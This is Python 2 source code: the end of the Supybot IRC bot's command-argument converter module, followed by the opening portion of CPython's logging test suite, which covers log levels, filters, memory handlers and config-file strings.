state.errorInvalid('channel', args[0])
def getHostmask(irc, msg, args, state):
if ircutils.isUserHostmask(args[0]):
state.args.append(args.pop(0))
else:
try:
hostmask = irc.state.nickToHostmask(args[0])
state.args.append(hostmask)
del args[0]
except KeyError:
state.errorInvalid('nick or hostmask', args[0])
def getBanmask(irc, msg, args, state):
getHostmask(irc, msg, args, state)
if not state.channel:
getChannel(irc, msg, args, state)
channel = state.channel
banmaskstyle = conf.supybot.protocols.irc.banmask
state.args[-1] = banmaskstyle.makeBanmask(state.args[-1])
def getUser(irc, msg, args, state):
try:
state.args.append(ircdb.users.getUser(msg.prefix))
except KeyError:
state.errorNotRegistered(Raise=True)
def getOtherUser(irc, msg, args, state):
# Although ircdb.users.getUser could accept a hostmask, we're explicitly
# excluding that from our interface with this check
if ircutils.isUserHostmask(args[0]):
state.errorNoUser(args[0])
try:
state.args.append(ircdb.users.getUser(args[0]))
del args[0]
except KeyError:
try:
getHostmask(irc, msg, [args[0]], state)
hostmask = state.args.pop()
state.args.append(ircdb.users.getUser(hostmask))
del args[0]
except (KeyError, callbacks.Error):
state.errorNoUser(name=args[0])
def _getRe(f):
def get(irc, msg, args, state, convert=True):
original = args[:]
s = args.pop(0)
def isRe(s):
try:
_ = f(s)
return True
except ValueError:
return False
try:
while len(s) < 512 and not isRe(s):
s += ' ' + args.pop(0)
if len(s) < 512:
if convert:
state.args.append(f(s))
else:
state.args.append(s)
else:
state.errorInvalid('regular expression', s)
except IndexError:
args[:] = original
state.errorInvalid('regular expression', s)
return get
getMatcher = _getRe(utils.str.perlReToPythonRe)
getReplacer = _getRe(utils.str.perlReToReplacer)
def getNick(irc, msg, args, state):
if ircutils.isNick(args[0]):
if 'nicklen' in irc.state.supported:
if len(args[0]) > irc.state.supported['nicklen']:
state.errorInvalid('nick', args[0],
'That nick is too long for this server.')
state.args.append(args.pop(0))
else:
state.errorInvalid('nick', args[0])
def getSeenNick(irc, msg, args, state, errmsg=None):
try:
_ = irc.state.nickToHostmask(args[0])
state.args.append(args.pop(0))
except KeyError:
if errmsg is None:
errmsg = 'I haven\'t seen %s.' % args[0]
state.error(errmsg, Raise=True)
def getChannel(irc, msg, args, state):
if args and irc.isChannel(args[0]):
channel = args.pop(0)
elif irc.isChannel(msg.args[0]):
channel = msg.args[0]
else:
state.log.debug('Raising ArgumentError because there is no channel.')
raise callbacks.ArgumentError
state.channel = channel
state.args.append(channel)
def getChannelDb(irc, msg, args, state, **kwargs):
channelSpecific = conf.supybot.databases.plugins.channelSpecific
try:
getChannel(irc, msg, args, state, **kwargs)
channel = channelSpecific.getChannelLink(state.channel)
state.channel = channel
state.args[-1] = channel
except (callbacks.ArgumentError, IndexError):
if channelSpecific():
raise
channel = channelSpecific.link()
if not conf.get(channelSpecific.link.allow, channel):
log.warning('channelSpecific.link is globally set to %s, but '
'%s disallowed linking to its db.', channel, channel)
raise
else:
channel = channelSpecific.getChannelLink(channel)
state.channel = channel
state.args.append(channel)
def inChannel(irc, msg, args, state):
if not state.channel:
getChannel(irc, msg, args, state)
if state.channel not in irc.state.channels:
state.error('I\'m not in %s.' % state.channel, Raise=True)
def onlyInChannel(irc, msg, args, state):
if not (irc.isChannel(msg.args[0]) and msg.args[0] in irc.state.channels):
state.error('This command may only be given in a channel that I am in.',
Raise=True)
else:
state.channel = msg.args[0]
state.args.append(state.channel)
def callerInGivenChannel(irc, msg, args, state):
channel = args[0]
if irc.isChannel(channel):
if channel in irc.state.channels:
if msg.nick in irc.state.channels[channel].users:
state.args.append(args.pop(0))
else:
state.error('You must be in %s.' % channel, Raise=True)
else:
state.error('I\'m not in %s.' % channel, Raise=True)
else:
state.errorInvalid('channel', args[0])
def nickInChannel(irc, msg, args, state):
originalArgs = state.args[:]
inChannel(irc, msg, args, state)
state.args = originalArgs
if args[0] not in irc.state.channels[state.channel].users:
state.error('%s is not in %s.' % (args[0], state.channel), Raise=True)
state.args.append(args.pop(0))
def getChannelOrNone(irc, msg, args, state):
try:
getChannel(irc, msg, args, state)
except callbacks.ArgumentError:
state.args.append(None)
def checkChannelCapability(irc, msg, args, state, cap):
if not state.channel:
getChannel(irc, msg, args, state)
cap = ircdb.canonicalCapability(cap)
cap = ircdb.makeChannelCapability(state.channel, cap)
if not ircdb.checkCapability(msg.prefix, cap):
state.errorNoCapability(cap, Raise=True)
def getOp(irc, msg, args, state):
checkChannelCapability(irc, msg, args, state, 'op')
def getHalfop(irc, msg, args, state):
checkChannelCapability(irc, msg, args, state, 'halfop')
def getVoice(irc, msg, args, state):
checkChannelCapability(irc, msg, args, state, 'voice')
def getLowered(irc, msg, args, state):
state.args.append(ircutils.toLower(args.pop(0)))
def getSomething(irc, msg, args, state, errorMsg=None, p=None):
if p is None:
p = lambda _: True
if not args[0] or not p(args[0]):
if errorMsg is None:
errorMsg = 'You must not give the empty string as an argument.'
state.error(errorMsg, Raise=True)
else:
state.args.append(args.pop(0))
def getSomethingNoSpaces(irc, msg, args, state, *L):
def p(s):
return len(s.split(None, 1)) == 1
getSomething(irc, msg, args, state, p=p, *L)
def private(irc, msg, args, state):
if irc.isChannel(msg.args[0]):
state.errorRequiresPrivacy(Raise=True)
def public(irc, msg, args, state, errmsg=None):
if not irc.isChannel(msg.args[0]):
if errmsg is None:
errmsg = 'This message must be sent in a channel.'
state.error(errmsg, Raise=True)
def checkCapability(irc, msg, args, state, cap):
cap = ircdb.canonicalCapability(cap)
if not ircdb.checkCapability(msg.prefix, cap):
state.errorNoCapability(cap, Raise=True)
def owner(irc, msg, args, state):
checkCapability(irc, msg, args, state, 'owner')
def admin(irc, msg, args, state):
checkCapability(irc, msg, args, state, 'admin')
def anything(irc, msg, args, state):
state.args.append(args.pop(0))
def getGlob(irc, msg, args, state):
glob = args.pop(0)
if '*' not in glob and '?' not in glob:
glob = '*%s*' % glob
state.args.append(glob)
def getUrl(irc, msg, args, state):
if utils.web.urlRe.match(args[0]):
state.args.append(args.pop(0))
else:
state.errorInvalid('url', args[0])
def getEmail(irc, msg, args, state):
if utils.net.emailRe.match(args[0]):
state.args.append(args.pop(0))
else:
state.errorInvalid('email', args[0])
def getHttpUrl(irc, msg, args, state):
if utils.web.httpUrlRe.match(args[0]):
state.args.append(args.pop(0))
elif utils.web.httpUrlRe.match('http://' + args[0]):
state.args.append('http://' + args.pop(0))
else:
state.errorInvalid('http url', args[0])
def getNow(irc, msg, args, state):
state.args.append(int(time.time()))
def getCommandName(irc, msg, args, state):
if ' ' in args[0]:
state.errorInvalid('command name', args[0])
else:
state.args.append(callbacks.canonicalName(args.pop(0)))
def getIp(irc, msg, args, state):
if utils.net.isIP(args[0]):
state.args.append(args.pop(0))
else:
state.errorInvalid('ip', args[0])
def getLetter(irc, msg, args, state):
if len(args[0]) == 1:
state.args.append(args.pop(0))
else:
state.errorInvalid('letter', args[0])
def getMatch(irc, msg, args, state, regexp, errmsg):
m = regexp.search(args[0])
if m is not None:
state.args.append(m)
del args[0]
else:
state.error(errmsg, Raise=True)
def getLiteral(irc, msg, args, state, literals, errmsg=None):
# ??? Should we allow abbreviations?
if isinstance(literals, basestring):
literals = (literals,)
abbrevs = utils.abbrev(literals)
if args[0] in abbrevs:
state.args.append(abbrevs[args.pop(0)])
elif errmsg is not None:
state.error(errmsg, Raise=True)
else:
raise callbacks.ArgumentError
def getTo(irc, msg, args, state):
if args[0].lower() == 'to':
args.pop(0)
def getPlugin(irc, msg, args, state, require=True):
cb = irc.getCallback(args[0])
if cb is not None:
state.args.append(cb)
del args[0]
elif require:
state.errorInvalid('plugin', args[0])
else:
state.args.append(None)
def getIrcColor(irc, msg, args, state):
if args[0] in ircutils.mircColors:
state.args.append(ircutils.mircColors[args.pop(0)])
else:
state.errorInvalid('irc color')
def getText(irc, msg, args, state):
if args:
state.args.append(' '.join(args))
args[:] = []
else:
raise IndexError
wrappers = ircutils.IrcDict({
'admin': admin,
'anything': anything,
'banmask': getBanmask,
'boolean': getBoolean,
'callerInGivenChannel': callerInGivenChannel,
'capability': getSomethingNoSpaces,
'channel': getChannel,
'channelDb': getChannelDb,
'checkCapability': checkCapability,
'checkChannelCapability': checkChannelCapability,
'color': getIrcColor,
'commandName': getCommandName,
'email': getEmail,
'expiry': getExpiry,
'filename': getSomething, # XXX Check for validity.
'float': getFloat,
'glob': getGlob,
'halfop': getHalfop,
'haveOp': getHaveOp,
'hostmask': getHostmask,
'httpUrl': getHttpUrl,
'id': getId,
'inChannel': inChannel,
'index': getIndex,
'int': getInt,
'ip': getIp,
'letter': getLetter,
'literal': getLiteral,
'long': getLong,
'lowered': getLowered,
'matches': getMatch,
'networkIrc': getNetworkIrc,
'nick': getNick,
'nickInChannel': nickInChannel,
'nonInt': getNonInt,
'nonNegativeInt': getNonNegativeInt,
'now': getNow,
'onlyInChannel': onlyInChannel,
'op': getOp,
'otherUser': getOtherUser,
'owner': owner,
'plugin': getPlugin,
'positiveInt': getPositiveInt,
'private': private,
'public': public,
'regexpMatcher': getMatcher,
'regexpReplacer': getReplacer,
'seenNick': getSeenNick,
'something': getSomething,
'somethingWithoutSpaces': getSomethingNoSpaces,
'text': getText,
'to': getTo,
'url': getUrl,
'user': getUser,
'validChannel': validChannel,
'voice': getVoice,
})
def addConverter(name, wrapper):
wrappers[name] = wrapper
class UnknownConverter(KeyError):
pass
def getConverter(name):
try:
return wrappers[name]
except KeyError, e:
raise UnknownConverter, str(e)
def callConverter(name, irc, msg, args, state, *L):
getConverter(name)(irc, msg, args, state, *L)
###
# Contexts. These determine what the nature of conversions is; whether they're
# defaulted, or many of them are allowed, etc. Contexts should be reusable;
# i.e., they should not maintain state between calls.
###
def contextify(spec):
if not isinstance(spec, context):
spec = context(spec)
return spec
def setDefault(state, default):
if callable(default):
state.args.append(default())
else:
state.args.append(default)
class context(object):
def __init__(self, spec):
self.args = ()
self.spec = spec # for repr
if isinstance(spec, tuple):
assert spec, 'tuple spec must not be empty.'
self.args = spec[1:]
self.converter = getConverter(spec[0])
elif spec is None:
self.converter = getConverter('anything')
elif isinstance(spec, basestring):
self.args = ()
self.converter = getConverter(spec)
else:
assert isinstance(spec, context)
self.converter = spec
def __call__(self, irc, msg, args, state):
log.debug('args before %r: %r', self, args)
self.converter(irc, msg, args, state, *self.args)
log.debug('args after %r: %r', self, args)
def __repr__(self):
return '<%s for %s>' % (self.__class__.__name__, self.spec)
class rest(context):
def __call__(self, irc, msg, args, state):
if args:
original = args[:]
args[:] = [' '.join(args)]
try:
super(rest, self).__call__(irc, msg, args, state)
except Exception, e:
args[:] = original
else:
raise IndexError
# additional means: Look for this (and make sure it's of this type). If
# there are no arguments for us to check, then use our default.
class additional(context):
def __init__(self, spec, default=None):
self.__parent = super(additional, self)
self.__parent.__init__(spec)
self.default = default
def __call__(self, irc, msg, args, state):
try:
self.__parent.__call__(irc, msg, args, state)
except IndexError:
log.debug('Got IndexError, returning default.')
setDefault(state, self.default)
# optional means: Look for this, but if it's not the type I'm expecting or
# there are no arguments for us to check, then use the default value.
class optional(additional):
def __call__(self, irc, msg, args, state):
try:
super(optional, self).__call__(irc, msg, args, state)
except (callbacks.ArgumentError, callbacks.Error), e:
log.debug('Got %s, returning default.', utils.exnToString(e))
state.errored = False
setDefault(state, self.default)
class any(context):
def __init__(self, spec, continueOnError=False):
self.__parent = super(any, self)
self.__parent.__init__(spec)
self.continueOnError = continueOnError
def __call__(self, irc, msg, args, state):
st = state.essence()
try:
while args:
self.__parent.__call__(irc, msg, args, st)
except IndexError:
pass
except (callbacks.ArgumentError, callbacks.Error), e:
if not self.continueOnError:
raise
else:
log.debug('Got %s, returning default.', utils.exnToString(e))
pass
state.args.append(st.args)
class many(any):
def __call__(self, irc, msg, args, state):
super(many, self).__call__(irc, msg, args, state)
if not state.args[-1]:
state.args.pop()
raise callbacks.ArgumentError
class first(context):
def __init__(self, *specs, **kw):
if 'default' in kw:
self.default = kw.pop('default')
assert not kw, 'Bad kwargs for first.__init__'
self.spec = specs # for __repr__
self.specs = map(contextify, specs)
def __call__(self, irc, msg, args, state):
errored = False
for spec in self.specs:
try:
spec(irc, msg, args, state)
return
except Exception, e:
errored = state.errored
state.errored = False
continue
if hasattr(self, 'default'):
state.args.append(self.default)
else:
state.errored = errored
raise e
class reverse(context):
def __call__(self, irc, msg, args, state):
args[:] = args[::-1]
super(reverse, self).__call__(irc, msg, args, state)
args[:] = args[::-1]
class commalist(context):
def __call__(self, irc, msg, args, state):
original = args[:]
st = state.essence()
trailingComma = True
try:
while trailingComma:
arg = args.pop(0)
if not arg.endswith(','):
trailingComma = False
for part in arg.split(','):
if part: # trailing commas
super(commalist, self).__call__(irc, msg, [part], st)
state.args.append(st.args)
except Exception, e:
args[:] = original
raise
class getopts(context):
"""The empty string indicates that no argument is taken; None indicates
that there is no converter for the argument."""
def __init__(self, getopts):
self.spec = getopts # for repr
self.getopts = {}
self.getoptL = []
for (name, spec) in getopts.iteritems():
if spec == '':
self.getoptL.append(name)
self.getopts[name] = None
else:
self.getoptL.append(name + '=')
self.getopts[name] = contextify(spec)
log.debug('getopts: %r', self.getopts)
log.debug('getoptL: %r', self.getoptL)
def __call__(self, irc, msg, args, state):
log.debug('args before %r: %r', self, args)
(optlist, rest) = getopt.getopt(args, '', self.getoptL)
getopts = []
for (opt, arg) in optlist:
opt = opt[2:] # Strip --
log.debug('opt: %r, arg: %r', opt, arg)
context = self.getopts[opt]
if context is not None:
st = state.essence()
context(irc, msg, [arg], st)
assert len(st.args) == 1
getopts.append((opt, st.args[0]))
else:
getopts.append((opt, True))
state.args.append(getopts)
args[:] = rest
log.debug('args after %r: %r', self, args)
###
# This is our state object, passed to converters along with irc, msg, and args.
###
class State(object):
log = log
def __init__(self, types):
self.args = []
self.kwargs = {}
self.types = types
self.channel = None
self.errored = False
def __getattr__(self, attr):
if attr.startswith('error'):
self.errored = True
return getattr(dynamic.irc, attr)
else:
raise AttributeError, attr
def essence(self):
st = State(self.types)
for (attr, value) in self.__dict__.iteritems():
if attr not in ('args', 'kwargs'):
setattr(st, attr, value)
return st
def __repr__(self):
return '%s(args=%r, kwargs=%r, channel=%r)' % (self.__class__.__name__,
self.args, self.kwargs,
self.channel)
###
# This is a compiled Spec object.
###
class Spec(object):
def _state(self, types, attrs={}):
st = State(types)
st.__dict__.update(attrs)
st.allowExtra = self.allowExtra
return st
def __init__(self, types, allowExtra=False):
self.types = types
self.allowExtra = allowExtra
utils.seq.mapinto(contextify, self.types)
def __call__(self, irc, msg, args, stateAttrs={}):
state = self._state(self.types[:], stateAttrs)
while state.types:
context = state.types.pop(0)
try:
context(irc, msg, args, state)
except IndexError:
raise callbacks.ArgumentError
if args and not state.allowExtra:
log.debug('args and not self.allowExtra: %r', args)
raise callbacks.ArgumentError
return state
def wrap(f, specList=[], name=None, **kw):
name = name or f.func_name
spec = Spec(specList, **kw)
def newf(self, irc, msg, args, **kwargs):
state = spec(irc, msg, args, stateAttrs={'cb': self, 'log': self.log})
self.log.debug('State before call: %s', state)
if state.errored:
self.log.debug('Refusing to call %s due to state.errored.', f)
else:
try:
f(self, irc, msg, args, *state.args, **state.kwargs)
except TypeError:
self.log.error('Spec: %s', specList)
self.log.error('Received args: %s', args)
code = f.func_code
funcArgs = inspect.getargs(code)[0][len(self.commandArgs):]
self.log.error('Extra args: %s', funcArgs)
raise
return utils.python.changeFunctionName(newf, name, f.__doc__)
__all__ = [
# Contexts.
'any', 'many',
'optional', 'additional',
'rest', 'getopts',
'first', 'reverse',
'commalist',
# Converter helpers.
'getConverter', 'addConverter', 'callConverter',
# Decorators.
'urlSnarfer', 'thread',
# Functions.
'wrap',
# Stuff for testing.
'Spec',
]
# This doesn't work. Suck.
## if world.testing:
## __all__.append('Spec')
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
test_logging.py
|
#!/usr/bin/env python
#
# Copyright 2001-2012 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2012 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import cPickle
import cStringIO
import gc
import json
import os
import random
import re
import select
import socket
from SocketServer import ThreadingTCPServer, StreamRequestHandler
import struct
import sys
import tempfile
from test.test_support import captured_stdout, run_with_locale, run_unittest
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
except ImportError:
threading = None
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
finally:
logging._releaseLock()
# Set two unused loggers: one non-ASCII and one Unicode.
# This is to test correct operation when sorting existing
# loggers in the configuration code. See issue 8201.
logging.getLogger("\xab\xd7\xbb")
logging.getLogger(u"\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = cStringIO.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
self.root_logger.addHandler(self.root_hdlr)
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warn(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warn (m())
DEB.info (m())
DEB.debug(m())
# These should not log.
ERR.warn(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warn(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warn(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warn(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_invalid_name(self):
self.assertRaises(TypeError, logging.getLogger, any)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warn(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
